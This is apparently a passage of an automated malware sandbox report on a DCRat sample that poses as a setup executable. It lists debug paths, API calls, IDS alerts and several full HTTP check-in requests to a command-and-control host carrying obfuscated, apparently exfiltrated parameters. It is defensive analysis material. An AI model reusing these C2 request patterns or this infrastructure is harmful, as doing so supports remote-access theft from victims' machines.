Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wC:\Users\user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Setupx-64.exe
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: zC:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: hC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: xC:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: oC:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005FFB000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.000000000618A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: ~C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: lC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: iC:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: lfons\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\*Rea)G{pt source: upfc.exe, 00000014.00000002.2680004850.000000001D2F9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000005062000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: gC:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Setupx-64.exe	Code function: 0_2_008BA5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_008BA5F4
Source: C:\Users\user\Desktop\Setupx-64.exe	Code function: 0_2_008CB8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_008CB8E0
Source: C:\Users\user\Desktop\Setupx-64.exe	Code function: 0_2_008DAAA8 FindFirstFileExA,	0_2_008DAAA8

Source: C:\Program Files (x86)\Google\Update\upfc.exe

Code function: 4x nop then jmp 00007FF7C83F527Dh

20_2_00007FF7C83F5205

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49692 -> 141.8.192.84:80
Source: Network traffic	Suricata IDS: 2850862 - Severity 1 - ETPRO MALWARE DCRat Initial Checkin Server Response M4 : 141.8.192.84:80 -> 192.168.2.5:49696
Source: Network traffic	Suricata IDS: 2850862 - Severity 1 - ETPRO MALWARE DCRat Initial Checkin Server Response M4 : 141.8.192.84:80 -> 192.168.2.5:49728

Source: Joe Sandbox View

ASN Name: SPRINTHOSTRU SPRINTHOSTRU

Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?m8gxGXCVv2=scSV9HzuSwMCjdTswbhT&RDrNbKAEY3sTBn6jEsDoIMfa=7UwoQ3Nj2bYlHh7zq43dti0XJstdpl&38d296bf10b75f50288ff78c7ce8263b=886958ac912bd532dd3d39de1ccac832&a67d1e031b8c1e808a6c381772ce6495=QZ1QWO5EWZzMTMlJGM2MDMhZjZ1EjY1ImM1gTOxMTM2kDZkBzNygTM&m8gxGXCVv2=scSV9HzuSwMCjdTswbhT&RDrNbKAEY3sTBn6jEsDoIMfa=7UwoQ3Nj2bYlHh7zq43dti0XJstdpl HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&c0fb3202b93362b1726aed31ca126308=0VfiIiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIwQTMkJzYmNzM4UDZ5YWO3ETZwMjM0Q2M2EGO5kzM2kjNmRzYzYDO1IiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&b19debc3db097a2b331de9c72156aebb=0VfiAjRaxmUuNGaSNzYnRzVh5mVIJWUCNFTnFkaNZTQE5kNVRVTnVlaNdXS6xEMBpHT5VkeXJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIwQTMkJzYmNzM4UDZ5YWO3ETZwMjM0Q2M2EGO5kzM2kjNmRzYzYDO1IiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&c0fb3202b93362b1726aed31ca126308=0VfiIiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiImNjNwgDZyEDMwkjYjVDN4ETNyITM4EGNlRWY4EWM1ADMjFjMzIjM2IiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=0VfiIiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMisHL9JSOWp2TpFFWkZnVXJGcSZ0YsZ1RiRlSDxUaV1GZwJ1MZJkSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&b19debc3db097a2b331de9c72156aebb=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 HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows 